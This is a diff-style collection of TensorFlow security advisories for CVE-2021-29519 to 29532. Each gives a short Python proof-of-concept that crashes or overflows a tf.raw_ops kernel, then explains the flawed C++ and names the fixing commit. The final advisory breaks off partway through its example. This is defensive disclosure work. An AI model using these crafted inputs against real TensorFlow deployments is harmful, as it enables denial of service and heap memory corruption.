This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,83 @@
## TFSA-2021-008: `CHECK`-fail in `SparseCross` due to type confusion
### CVE Number
CVE-2021-29519
### Impact
The API of `tf.raw_ops.SparseCross` allows combinations which would
result in a `CHECK`-failure and denial of service:
```python
import tensorflow as tf
hashed_output = False
num_buckets = 1949315406
hash_key = 1869835877
out_type = tf.string
internal_type = tf.string
indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64)
indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.constant([0], dtype=tf.int64)
values_2 = tf.constant([72], dtype=tf.int64)
values = [values_1, values_2]
batch_size = 4
shape_1 = tf.constant([4, 122], dtype=tf.int64)
shape_2 = tf.constant([4, 188], dtype=tf.int64)
shapes = [shape_1, shape_2]
dense_1 = tf.constant([188, 127, 336, 0], shape=[4, 1], dtype=tf.int64)
dense_2 = tf.constant([341, 470, 470, 470], shape=[4, 1], dtype=tf.int64)
dense_3 = tf.constant([188, 188, 341, 922], shape=[4, 1], dtype=tf.int64)
denses = [dense_1, dense_2, dense_3]
tf.raw_ops.SparseCross(indices=indices, values=values, shapes=shapes, dense_inputs=denses, hashed_output=hashed_output,
num_buckets=num_buckets, hash_key=hash_key, out_type=out_type, internal_type=internal_type)
```
The above code will result in a `CHECK` fail in
[`tensor.cc`](https://github.com/tensorflow/tensorflow/blob/3d782b7d47b1bf2ed32bd4a246d6d6cadc4c903d/tensorflow/core/framework/tensor.cc#L670-L675):
```cc
void Tensor::CheckTypeAndIsAligned(DataType expected_dtype) const {
CHECK_EQ(dtype(), expected_dtype)
<< " " << DataTypeString(expected_dtype) << " expected, got "
<< DataTypeString(dtype());
...
}
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/3d782b7d47b1bf2ed32bd4a246d6d6cadc4c903d/tensorflow/core/kernels/sparse_cross_op.cc#L114-L116)
is tricked to consider a tensor of type `tstring` which in fact contains
integral elements:
```cc
if (DT_STRING == values_.dtype())
return Fingerprint64(values_.vec<tstring>().data()[start + n]);
return values_.vec<int64>().data()[start + n];
```
Fixing the type confusion by preventing mixing `DT_STRING` and `DT_INT64` types
solves this issue.
### Patches
We have patched the issue in GitHub commit
[b1cc5e5a50e7cee09f2c6eb48eb40ee9c4125025](https://github.com/tensorflow/tensorflow/commit/b1cc5e5a50e7cee09f2c6eb48eb40ee9c4125025).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,57 @@
## TFSA-2021-009: Segfault in `SparseCountSparseOutput`
### CVE Number
CVE-2021-29521
### Impact
Specifying a negative dense shape in `tf.raw_ops.SparseCountSparseOutput`
results in a segmentation fault being thrown out from the standard library as
`std::vector` invariants are broken.
```python
import tensorflow as tf
indices = tf.constant([], shape=[0, 0], dtype=tf.int64)
values = tf.constant([], shape=[0, 0], dtype=tf.int64)
dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64)
weights = tf.constant([], shape=[0, 0], dtype=tf.int64)
tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L199-L213)
assumes the first element of the dense shape is always positive and uses it to
initialize a `BatchedMap<T>` (i.e.,
[`std::vector<absl::flat_hash_map<int64,T>>`](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L27))
data structure.
```cc
bool is_1d = shape.NumElements() == 1;
int num_batches = is_1d ? 1 : shape.flat<int64>()(0);
...
auto per_batch_counts = BatchedMap<W>(num_batches);
```
If the `shape` tensor has more than one element, `num_batches` is the first
value in `shape`.
Ensuring that the `dense_shape` argument is a valid tensor shape (that is, all
elements are non-negative) solves this issue.
### Patches
We have patched the issue in GitHub commit
[c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5](https://github.com/tensorflow/tensorflow/commit/c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2 and TensorFlow 2.3.3.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,54 @@
## TFSA-2021-010: Heap buffer overflow in `Conv3DBackprop*`
### CVE Number
CVE-2021-29520
### Impact
Missing validation between arguments to `tf.raw_ops.Conv3DBackprop*` operations
can result in heap buffer overflows:
```python
import tensorflow as tf
input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32)
out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 89, 29, 89, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
```
```python
import tensorflow as tf
input_values = [-10.0] * (7 * 7 * 7 * 7 * 7)
input_values[0] = 429.6491056791816
input_sizes = tf.constant(input_values, shape=[7, 7, 7, 7, 7], dtype=tf.float32)
filter_tensor = tf.constant([7, 7, 7, 1, 1], shape=[5], dtype=tf.int32)
out_backprop = tf.constant([-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[7, 1, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 37, 65, 93, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/4814fafb0ca6b5ab58a09411523b2193fed23fed/tensorflow/core/kernels/conv_grad_shape_utils.cc#L94-L153)
assumes that the `input`, `filter_sizes` and `out_backprop` tensors have the
same shape, as they are accessed in parallel.
### Patches
We have patched the issue in GitHub commit
[8f37b52e1320d8d72a9529b2468277791a261197](https://github.com/tensorflow/tensorflow/commit/8f37b52e1320d8d72a9529b2468277791a261197).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,64 @@
## TFSA-2021-011: Division by 0 in `Conv3DBackprop*`
### CVE Number
CVE-2021-29522
### Impact
The `tf.raw_ops.Conv3DBackprop*` operations fail to validate that the input
tensors are not empty. In turn, this would result in a division by 0:
```python
import tensorflow as tf
input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
```
```python
import tensorflow as tf
input_sizes = tf.constant([1], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
filter_tensor = tf.constant([0, 0, 0, 1, 0], shape=[5], dtype=tf.int32)
out_backprop = tf.constant([], shape=[1, 1, 1, 1, 0], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/a91bb59769f19146d5a0c20060244378e878f140/tensorflow/core/kernels/conv_grad_ops_3d.cc#L430-L450)
does not check that the divisor used in computing the shard size is not zero:
```cc
const int64 size_A = output_image_size * dims.out_depth;
const int64 size_B = filter_total_size * dims.out_depth;
const int64 size_C = output_image_size * filter_total_size;
const int64 work_unit_size = size_A + size_B + size_C;
...
const size_t shard_size =
use_parallel_contraction
? 1
: (target_working_set_size + work_unit_size - 1) / work_unit_size;
```
Thus, if attacker controls the input sizes, they can trigger a denial of service
via a division by zero error.
### Patches
We have patched the issue in GitHub commit
[311403edbc9816df80274bd1ea8b3c0c0f22c3fa](https://github.com/tensorflow/tensorflow/commit/311403edbc9816df80274bd1ea8b3c0c0f22c3fa).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,103 @@
## TFSA-2021-012: `CHECK`-fail in `AddManySparseToTensorsMap`
### CVE Number
CVE-2021-29523
### Impact
An attacker can trigger a denial of service via a `CHECK`-fail in
`tf.raw_ops.AddManySparseToTensorsMap`:
```python
import tensorflow as tf
import numpy as np
sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64)
sparse_values = tf.ones([1], dtype=tf.int64)
shape = tf.Variable(tf.ones([55], dtype=tf.int64))
shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64))
tf.raw_ops.AddManySparseToTensorsMap(
sparse_indices=sparse_indices,
sparse_values=sparse_values,
sparse_shape=shape)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/kernels/sparse_tensors_map_ops.cc#L257)
takes the values specified in `sparse_shape` as dimensions for the output shape:
```cc
TensorShape tensor_input_shape(input_shape->vec<int64>());
```
The [`TensorShape`
constructor](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188)
uses a `CHECK` operation which triggers when
[`InitDims`](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296)
returns a non-OK status.
```cc
template <class Shape>
TensorShapeBase<Shape>::TensorShapeBase(gtl::ArraySlice<int64> dim_sizes) {
set_tag(REP16);
set_data_type(DT_INVALID);
TF_CHECK_OK(InitDims(dim_sizes));
}
```
In our scenario, this occurs when adding a dimension from the argument results
in overflow:
```cc
template <class Shape>
Status TensorShapeBase<Shape>::InitDims(gtl::ArraySlice<int64> dim_sizes) {
...
Status status = OkStatus();
for (int64 s : dim_sizes) {
status.Update(AddDimWithStatus(internal::SubtleMustCopy(s)));
if (!status.ok()) {
return status;
}
}
}
template <class Shape>
Status TensorShapeBase<Shape>::AddDimWithStatus(int64 size) {
...
int64 new_num_elements;
if (kIsPartial && (num_elements() < 0 || size < 0)) {
new_num_elements = -1;
} else {
new_num_elements = MultiplyWithoutOverflow(num_elements(), size);
if (TF_PREDICT_FALSE(new_num_elements < 0)) {
return errors::Internal("Encountered overflow when multiplying ",
num_elements(), " with ", size,
", result: ", new_num_elements);
}
}
...
}
```
This is a legacy implementation of the constructor and operations should
use `BuildTensorShapeBase` or `AddDimWithStatus` to prevent `CHECK`-failures in
the presence of overflows.
### Patches
We have patched the issue in GitHub commit
[69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c](https://github.com/tensorflow/tensorflow/commit/69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,46 @@
## TFSA-2021-013: Division by 0 in `Conv2DBackpropFilter`
### CVE Number
CVE-2021-29524
### Impact
An attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropFilter`:
```python
import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 66, 18, 1], use_cudnn_on_gpu=True,
padding='SAME', explicit_paddings=[],
data_format='NHWC', dilations=[1, 1, 1, 1])
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/496c2630e51c1a478f095b084329acedb253db6b/tensorflow/core/kernels/conv_grad_shape_utils.cc#L130) does a modulus operation where the divisor is controlled by the caller:
```cc
if (dims->in_depth % filter_shape.dim_size(num_dims - 2)) { ... }
```
### Patches
We have patched the issue in GitHub commit
[fca9874a9b42a2134f907d2fb46ab774a831404a](https://github.com/tensorflow/tensorflow/commit/fca9874a9b42a2134f907d2fb46ab774a831404a).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,53 @@
## TFSA-2021-014: Division by 0 in `Conv2DBackpropInput`
### CVE Number
CVE-2021-29525
### Impact
An attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropInput`:
```python
import tensorflow as tf
input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor,
out_backprop=out_backprop, strides=[1, 1, 1, 1],
use_cudnn_on_gpu=True, padding='SAME',
explicit_paddings=[], data_format='NHWC',
dilations=[1, 1, 1, 1])
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/b40060c9f697b044e3107917c797ba052f4506ab/tensorflow/core/kernels/conv_grad_input_ops.h#L625-L655) does a division by a quantity that is controlled by the caller:
```cc
const size_t size_A = output_image_size * dims.out_depth;
const size_t size_B = filter_total_size * dims.out_depth;
const size_t size_C = output_image_size * filter_total_size;
const size_t work_unit_size = size_A + size_B + size_C;
...
const size_t shard_size =
use_parallel_contraction ? 1 :
(target_working_set_size + work_unit_size - 1) / work_unit_size;
```
### Patches
We have patched the issue in GitHub commit
[2be2cdf3a123e231b16f766aa0e27d56b4606535](https://github.com/tensorflow/tensorflow/commit/2be2cdf3a123e231b16f766aa0e27d56b4606535).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,44 @@
## TFSA-2021-015: Division by 0 in `Conv2D`
### CVE Number
CVE-2021-29526
### Impact
An attacker can trigger a division by 0 in `tf.raw_ops.Conv2D`:
```python
import tensorflow as tf
input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/988087bd83f144af14087fe4fecee2d250d93737/tensorflow/core/kernels/conv_ops.cc#L261-L263) does a division by a quantity that is controlled by the caller:
```cc
const int64 patch_depth = filter.dim_size(2);
if (in_depth % patch_depth != 0) { ... }
```
### Patches
We have patched the issue in GitHub commit
[b12aa1d44352de21d1a6faaf04172d8c2508b42b](https://github.com/tensorflow/tensorflow/commit/b12aa1d44352de21d1a6faaf04172d8c2508b42b).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,49 @@
## TFSA-2021-016: Division by 0 in `QuantizedConv2D`
### CVE Number
CVE-2021-29527
### Impact
An attacker can trigger a division by 0 in `tf.raw_ops.QuantizedConv2D`:
```python
import tensorflow as tf
input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8)
filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8)
min_input = tf.constant(0.0)
max_input = tf.constant(0.0001)
min_filter = tf.constant(0.0)
max_filter = tf.constant(0.0001)
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.QuantizedConv2D(input=input, filter=filter, min_input=min_input, max_input=max_input, min_filter=min_filter, max_filter=max_filter, strides=strides, padding=padding)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/00e9a4d67d76703fa1aee33dac582acf317e0e81/tensorflow/core/kernels/quantized_conv_ops.cc#L257-L259) does a division by a quantity that is controlled by the caller:
```cc
const int filter_value_count = filter_width * filter_height * input_depth;
const int64 patches_per_chunk = kMaxChunkSize / (filter_value_count * sizeof(T1));
```
### Patches
We have patched the issue in GitHub commit
[cfa91be9863a91d5105a3b4941096044ab32036b](https://github.com/tensorflow/tensorflow/commit/cfa91be9863a91d5105a3b4941096044ab32036b).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,54 @@
## TFSA-2021-017: Division by 0 in `QuantizedMul`
### CVE Number
CVE-2021-29528
### Impact
An attacker can trigger a division by 0 in `tf.raw_ops.QuantizedMul`:
```python
import tensorflow as tf
x = tf.zeros([4, 1], dtype=tf.quint8)
y = tf.constant([], dtype=tf.quint8)
min_x = tf.constant(0.0)
max_x = tf.constant(0.0010000000474974513)
min_y = tf.constant(0.0)
max_y = tf.constant(0.0010000000474974513)
tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/55900e961ed4a23b438392024912154a2c2f5e85/tensorflow/core/kernels/quantized_mul_op.cc#L188-L198) does a division by a quantity that is controlled by the caller:
```cc
template <class T, class Toutput>
void VectorTensorMultiply(const T* vector_data, int32 vector_offset,
int64 vector_num_elements, const T* tensor_data,
int32 tensor_offset, int64 tensor_num_elements,
Toutput* output) {
for (int i = 0; i < tensor_num_elements; ++i) {
const int64 vector_i = i % vector_num_elements;
...
}
}
```
### Patches
We have patched the issue in GitHub commit
[a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6](https://github.com/tensorflow/tensorflow/commit/a1b11d2fdd1e51bfe18bb1ede804f60abfa92da6).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,85 @@
## TFSA-2021-018: Invalid validation in `SparseMatrixSparseCholesky`
### CVE Number
CVE-2021-29530
### Impact
An attacker can trigger a null pointer dereference by providing an invalid
`permutation` to `tf.raw_ops.SparseMatrixSparseCholesky`:
```python
import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops
indices_array = np.array([[0, 0]])
value_array = np.array([-10.0], dtype=np.float32)
dense_shape = [1, 1]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
st.indices, st.values, st.dense_shape)
permutation = tf.constant([], shape=[1, 0], dtype=tf.int32)
tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/080f1d9e257589f78b3ffb75debf584168aa6062/tensorflow/core/kernels/sparse/sparse_cholesky_op.cc#L85-L86) fails to properly validate the input arguments:
```cc
void Compute(OpKernelContext* ctx) final {
...
const Tensor& input_permutation_indices = ctx->input(1);
...
ValidateInputs(ctx, *input_matrix, input_permutation_indices, &batch_size, &num_rows);
...
}
void ValidateInputs(OpKernelContext* ctx,
const CSRSparseMatrix& sparse_matrix,
const Tensor& permutation_indices, int* batch_size,
int64* num_rows) {
OP_REQUIRES(ctx, sparse_matrix.dtype() == DataTypeToEnum<T>::value, ...)
...
}
```
Although `ValidateInputs` is called and there are checks in the body of this
function, the code proceeds to the next line in `ValidateInputs` since
[`OP_REQUIRES`](https://github.com/tensorflow/tensorflow/blob/080f1d9e257589f78b3ffb75debf584168aa6062/tensorflow/core/framework/op_requires.h#L41-L48)
is a macro that only exits the current function.
```cc
#define OP_REQUIRES(CTX, EXP, STATUS) \
do { \
if (!TF_PREDICT_TRUE(EXP)) { \
CheckNotInComputeAsync((CTX), "OP_REQUIRES_ASYNC"); \
(CTX)->CtxFailure(__FILE__, __LINE__, (STATUS)); \
return; \
} \
} while (0)
```
Thus, the first validation condition that fails in `ValidateInputs` will cause
an early return from that function. However, the caller will continue execution
from the next line. The fix is to either explicitly check `context->status()`
or to convert `ValidateInputs` to return a `Status`.
### Patches
We have patched the issue in GitHub commit
[e6a7c7cc18c3aaad1ae0872cb0a959f5c923d2bd](https://github.com/tensorflow/tensorflow/commit/e6a7c7cc18c3aaad1ae0872cb0a959f5c923d2bd).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,78 @@
## TFSA-2021-019: Heap buffer overflow caused by rounding
### CVE Number
CVE-2021-29529
### Impact
An attacker can trigger a heap buffer overflow in
`tf.raw_ops.QuantizedResizeBilinear` by manipulating input values so that float
rounding results in off-by-one error in accessing image elements:
```python
import tensorflow as tf
l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384]
images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32)
size = tf.constant([12, 6], shape=[2], dtype=tf.int32)
min = tf.constant(80.22522735595703)
max = tf.constant(80.39215850830078)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max,
align_corners=True, half_pixel_centers=True)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/44b7f486c0143f68b56c34e2d01e146ee445134a/tensorflow/core/kernels/quantized_resize_bilinear_op.cc#L62-L66)
computes two integers (representing the upper and lower bounds for
interpolation) by ceiling and flooring a floating point value:
```cc
const float in_f = std::floor(in);
interpolation->lower[i] = std::max(static_cast<int64>(in_f), static_cast<int64>(0));
interpolation->upper[i] = std::min(static_cast<int64>(std::ceil(in)), in_size - 1);
```
For some values of `in`, `interpolation->upper[i]` might be smaller than
`interpolation->lower[i]`. This is an issue if `interpolation->upper[i]` is
capped at `in_size-1` as it means that `interpolation->lower[i]` points outside
of the image. Then, [in the interpolation
code](https://github.com/tensorflow/tensorflow/blob/44b7f486c0143f68b56c34e2d01e146ee445134a/tensorflow/core/kernels/quantized_resize_bilinear_op.cc#L245-L264),
this would result in heap buffer overflow:
```cc
template <int RESOLUTION, typename T, typename T_SCALE, typename T_CALC>
inline void OutputLerpForChannels(const InterpolationCache<T_SCALE>& xs,
const int64 x, const T_SCALE ys_ilerp,
const int channels, const float min,
const float max, const T* ys_input_lower_ptr,
const T* ys_input_upper_ptr,
T* output_y_ptr) {
const int64 xs_lower = xs.lower[x];
...
for (int c = 0; c < channels; ++c) {
const T top_left = ys_input_lower_ptr[xs_lower + c];
...
}
}
```
For the other cases where `interpolation->upper[i]` is smaller than
`interpolation->lower[i]`, we can set them to be equal without affecting the
output.
### Patches
We have patched the issue in GitHub commit
[f851613f8f0fb0c838d160ced13c134f778e3ce7](https://github.com/tensorflow/tensorflow/commit/f851613f8f0fb0c838d160ced13c134f778e3ce7).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,59 @@
## TFSA-2021-020: `CHECK`-fail in `tf.raw_ops.EncodePng`
### CVE Number
CVE-2021-29531
### Impact
An attacker can trigger a `CHECK` fail in PNG encoding by providing an empty
input tensor as the pixel data:
```python
import tensorflow as tf
image = tf.zeros([0, 0, 3])
image = tf.cast(image, dtype=tf.uint8)
tf.raw_ops.EncodePng(image=image)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/e312e0791ce486a80c9d23110841525c6f7c3289/tensorflow/core/kernels/image/encode_png_op.cc#L57-L60)
only validates that the total number of pixels in the image does not overflow.
Thus, an attacker can send an empty matrix for encoding. However, if the tensor
is empty, then the associated buffer is `nullptr`. Hence, when [calling
`png::WriteImageToBuffer`](https://github.com/tensorflow/tensorflow/blob/e312e0791ce486a80c9d23110841525c6f7c3289/tensorflow/core/kernels/image/encode_png_op.cc#L79-L93),
the first argument (i.e., `image.flat<T>().data()`) is `NULL`. This then
triggers the `CHECK_NOTNULL` in the [first line of
`png::WriteImageToBuffer`](https://github.com/tensorflow/tensorflow/blob/e312e0791ce486a80c9d23110841525c6f7c3289/tensorflow/core/lib/png/png_io.cc#L345-L349).
```cc
template <typename T>
bool WriteImageToBuffer(
const void* image, int width, int height, int row_bytes, int num_channels,
int channel_bits, int compression, T* png_string,
const std::vector<std::pair<std::string, std::string> >* metadata) {
CHECK_NOTNULL(image);
...
}
```
Since `image` is null, this results in `abort` being called after printing the
stacktrace. Effectively, this allows an attacker to mount a denial of service
attack.
### Patches
We have patched the issue in GitHub commit
[26eb323554ffccd173e8a79a8c05c15b685ae4d1](https://github.com/tensorflow/tensorflow/commit/26eb323554ffccd173e8a79a8c05c15b685ae4d1).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,88 @@
## TFSA-2021-021: Heap out of bounds read in `RaggedCross`
### CVE Number
CVE-2021-29532
### Impact
An attacker can force accesses outside the bounds of heap allocated arrays by
passing in invalid tensor values to `tf.raw_ops.RaggedCross`:
```python
import tensorflow as tf
ragged_values = []
ragged_row_splits = []
sparse_indices = []
sparse_values = []
sparse_shape = []
dense_inputs_elem = tf.constant([], shape=[92, 0], dtype=tf.int64)
dense_inputs = [dense_inputs_elem]
input_order = "R"
hashed_output = False
num_buckets = 0
hash_key = 0
